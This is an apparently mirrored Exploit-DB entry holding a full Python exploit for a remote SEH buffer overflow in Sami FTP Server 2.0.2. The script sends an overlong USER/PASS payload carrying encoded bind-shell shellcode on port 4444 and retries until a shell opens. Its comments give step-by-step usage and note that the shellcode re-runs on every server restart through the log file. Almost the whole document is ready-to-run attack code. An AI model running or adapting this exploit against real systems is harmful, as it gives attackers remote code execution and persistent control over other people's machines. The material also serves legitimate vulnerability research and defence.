KarjaSoft Sami FTP Server 2.0.2 – USER/PASS Remote Buffer Overflow (SEH)

• Exploit Database
• 17 阅读

• 作者： n30m1nd
  日期： 2016-11-01
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/40675/

• #/usr/bin/python
  #-*- Coding: utf-8 -*-
  
  ### Sami FTP Server 2.0.2- SEH Overwrite, Buffer Overflow by n30m1nd ### 
  
  # Date: 2016-01-11
  # Exploit Author: n30m1nd
  # Vendor Homepage: http://www.karjasoft.com/
  # Software Link: http://www.karjasoft.com/files/samiftp/samiftpd_install.exe
  # Version: 2.0.2
  # Tested on: Win7 64bit and Win10 64 bit
  
  # Credits
  # =======
  # Thanks to PHRACK for maintaining all the articles up for so much time... 
  # These are priceless and still current for exploit development!!
  # Shouts to the crew at Offensive Security for their huge efforts on making	the infosec community better
  
  # How to
  # ======
  # * Open Sami FTP Server and open its graphical interface
  # * Run this python script and write the IP to attack
  # * Connect to the same IP on port 4444
  #
  # BONUS
  # =====
  # Since the program will write the data into its (SamiFTP.binlog) logs it will try to load these logs on each
  # start and so, it will crash and run our shellcode everytime it starts.
  
  # Why?
  # ====
  # The graphical interface tries to show the user name which produces an overflow overwriting SEH
  
  # Exploit code
  # ============
  
  import socket
  import struct
  
  def doHavoc(ipaddr):
  # Bad chars: 00 0d 0a ff
  alignment = "\x90"*3
  
  jmpfront = "345A7504".decode('hex')
  #CPU Disasm
  #Hex dumpCommand 
  #34 5A XOR AL,5A
  #75 04 JNE SHORT +04
  
  # pop pop ret in tmp01.dll
  popret = 0x10022ADE
  
  # fstenv trick to get eip: phrack number 62
  # and store it into EAX for the metasploit shell (BufferRegister)
  getEIPinEAX = "D9EED934E48B44E40C040b".decode('hex')
  #CPU Disasm
  #Hex dumpCommand
  #D9EEFLDZ
  #D934E4FSTENV SS:[ESP]
  #8B44E4 0C MOV EAX,DWORD PTR SS:[ESP+0C]
  #04 0B ADD AL,0B
  
  # Bind shellcode on port 4444 - alpha mixed BufferRegister=EAX
  shellcode = (
  getEIPinEAX + 
  "PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIylm8mRS0UP7p"
  "e0K9jEDqYPU4Nk60VPlKCbdLnkbrWdLKqb4hfoNWczEvdqyoNLElpaalC2dl10kq"
  "xO6mEQ9WxbjRf22wNkf220lKsz5lNkblr1sHxcsxGqZqcaLK0YQ05QiCNkCyB8Hc"
  "VZ1Ynk5dlKEQyF01IoNLYQHOvm31yW6X9pRUXvwsSMIhgKqmDdT5KTf8NkaHWTEQ"
  "yCavNkDLBklKbx7lgqN3nkC4nkuQXPk9w47Tq4skaKsQV9pZPQkOYpcosobzNkWb"
  "8kNmSmbH5cP2C0Wpu8Qgd3UbCof4e80LD7ev379oyElxlP31GpWpFIo4V4bpCXa9"
  "op2KePyohURJFhPY0P8bimw0pPG0rpu8xjDOYOipYoiEj7QxWrC0wa3lmYZFbJDP"
  "qFqGCXYRIKDw3WkOZuv7CXNWkYehKOkOiEaGPhD4HlwKm1KOhUQGJ7BHRUpnrmqq"
  "Iokee83S2McT30oyXcQGV767FQIfcZfrv9PVYrImQvKwG4DdelvaGqLM0D5tDPO6"
  "GpRd0T602vaFF6w666rnqFsf2sPV0h2YzleoovYoXUK9kPrnSfPFYo00Ph7xk7wm"
  "sPYoKeMkxplulb2vsXoVmEOMomKO9EgL4FCLFjk0YkM0qec5Mkg7FsD2ROqzGpv3"
  "ioJuAA"
  )
  
  # Final payload, SEH overwrite ocurrs at 600 bytes
  payload = alignment + "."*(600-len(alignment)-len(jmpfront)) + jmpfront + struct.pack("<L", popret) + shellcode
  try:
  s = socket.create_connection((ipaddr, 21))
  s.send("USER "+ payload +"\r\n" )
  print s.recv(4096)
  
  s.send("PASS "+ payload +"\r\n" )
  print s.recv(4096)
  print s.recv(4096)
  except e:
  print str(e)
  exit("[+] Couldn't connect")
  
  if __name__ == "__main__":
  ipaddr = raw_input("[+] IP: ")
  doHavoc(ipaddr)
  while raw_input("[?] Got shell?(y/n) ").lower() == "n":
  doHavoc(ipaddr)
  print "[+] Enjoy..."